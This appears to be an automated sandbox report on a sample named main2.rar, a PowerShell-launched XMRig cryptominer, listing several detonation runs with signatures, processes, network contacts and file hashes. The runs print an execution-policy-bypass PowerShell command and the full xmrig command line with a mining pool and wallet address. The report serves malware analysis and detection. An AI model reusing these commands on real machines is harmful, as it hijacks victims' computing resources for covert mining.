Malware Analysis Report

2025-04-19 15:37

Sample ID 240522-ytv8vseg37
Target main2.rar
SHA256 08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b
Tags
xmrig execution miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral31

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral32

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b

Threat Level: Known bad

The file main2.rar was found to be: Known bad.

Malicious Activity Summary

xmrig execution miner

XMRig Miner payload

xmrig

Blocklisted process makes network request

Executes dropped EXE

Command and Scripting Interpreter: PowerShell

Suspicious behavior: LoadsDriver

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-22 20:05

Signatures

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:39

Platform

win10-20240404-en

Max time kernel

1799s

Max time network

1776s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 211.143.182.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp

Files

memory/4324-2-0x00007FFFCCAA3000-0x00007FFFCCAA4000-memory.dmp

memory/4324-5-0x00000145B04D0000-0x00000145B04F2000-memory.dmp

memory/4324-7-0x00007FFFCCAA0000-0x00007FFFCD48C000-memory.dmp

memory/4324-9-0x00000145B0600000-0x00000145B0676000-memory.dmp

memory/4324-10-0x00007FFFCCAA0000-0x00007FFFCD48C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vrc3yewt.435.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4324-25-0x00007FFFCCAA0000-0x00007FFFCD48C000-memory.dmp

memory/4324-29-0x00007FFFCCAA3000-0x00007FFFCCAA4000-memory.dmp

memory/4324-30-0x00007FFFCCAA0000-0x00007FFFCD48C000-memory.dmp

memory/4324-31-0x00007FFFCCAA0000-0x00007FFFCD48C000-memory.dmp

memory/4324-51-0x00000145B03F0000-0x00000145B0402000-memory.dmp

memory/4324-64-0x0000014597F20000-0x0000014597F2A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2096-93-0x000001B756F50000-0x000001B756F70000-memory.dmp

memory/2096-94-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-95-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-96-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-97-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-98-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-99-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-100-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-101-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-102-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-103-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-104-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-105-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-106-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-107-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-108-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-109-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-110-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-111-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-112-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-113-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-114-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-115-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-116-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-117-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-118-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-119-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-120-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-121-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-122-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-123-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-124-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-125-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-126-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-127-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-128-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-129-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-130-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-131-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-132-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-133-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-134-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-135-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-136-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-137-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-138-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-139-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-140-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-141-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-142-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-143-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-144-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-145-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-146-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-147-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-148-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-149-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-150-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-151-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-152-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-153-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-154-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-155-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-156-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:44

Platform

win11-20240508-en

Max time kernel

1789s

Max time network

1747s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/2172-0-0x00007FFD4C3B3000-0x00007FFD4C3B5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qlrn1v3i.enf.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2172-9-0x000002BFBD6C0000-0x000002BFBD6E2000-memory.dmp

memory/2172-10-0x00007FFD4C3B0000-0x00007FFD4CE72000-memory.dmp

memory/2172-11-0x00007FFD4C3B0000-0x00007FFD4CE72000-memory.dmp

memory/2172-12-0x00007FFD4C3B0000-0x00007FFD4CE72000-memory.dmp

memory/2172-14-0x000002BFBD750000-0x000002BFBD762000-memory.dmp

memory/2172-15-0x000002BFBD740000-0x000002BFBD74A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3736-46-0x0000020E2B0C0000-0x0000020E2B0E0000-memory.dmp

memory/3736-47-0x0000020E2CA00000-0x0000020E2CA20000-memory.dmp

memory/3736-48-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/2172-49-0x00007FFD4C3B0000-0x00007FFD4CE72000-memory.dmp

memory/3736-53-0x0000020EBF5F0000-0x0000020EBF610000-memory.dmp

memory/3736-50-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-52-0x0000020E2CA20000-0x0000020E2CA40000-memory.dmp

memory/2172-51-0x00007FFD4C3B3000-0x00007FFD4C3B5000-memory.dmp

memory/2172-54-0x00007FFD4C3B0000-0x00007FFD4CE72000-memory.dmp

memory/3736-55-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-56-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-57-0x0000020E2CA20000-0x0000020E2CA40000-memory.dmp

memory/3736-58-0x0000020EBF5F0000-0x0000020EBF610000-memory.dmp

memory/3736-59-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-60-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-61-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-62-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-63-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-64-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-65-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-66-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-67-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-68-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-69-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-70-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-71-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-72-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-73-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-74-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-75-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-76-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-77-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-78-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-79-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-80-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-81-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-82-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-83-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-84-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-85-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-86-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-87-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-88-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-89-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-90-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-91-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-92-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-93-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-94-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-95-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-96-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-97-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-98-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-99-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-100-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-101-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-102-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-103-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-104-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-105-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-106-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-107-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-108-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-109-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-110-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-111-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-112-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-113-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-114-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-115-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-116-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-117-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

Analysis: behavioral25

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:47

Platform

win11-20240426-en

Max time kernel

1793s

Max time network

1802s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

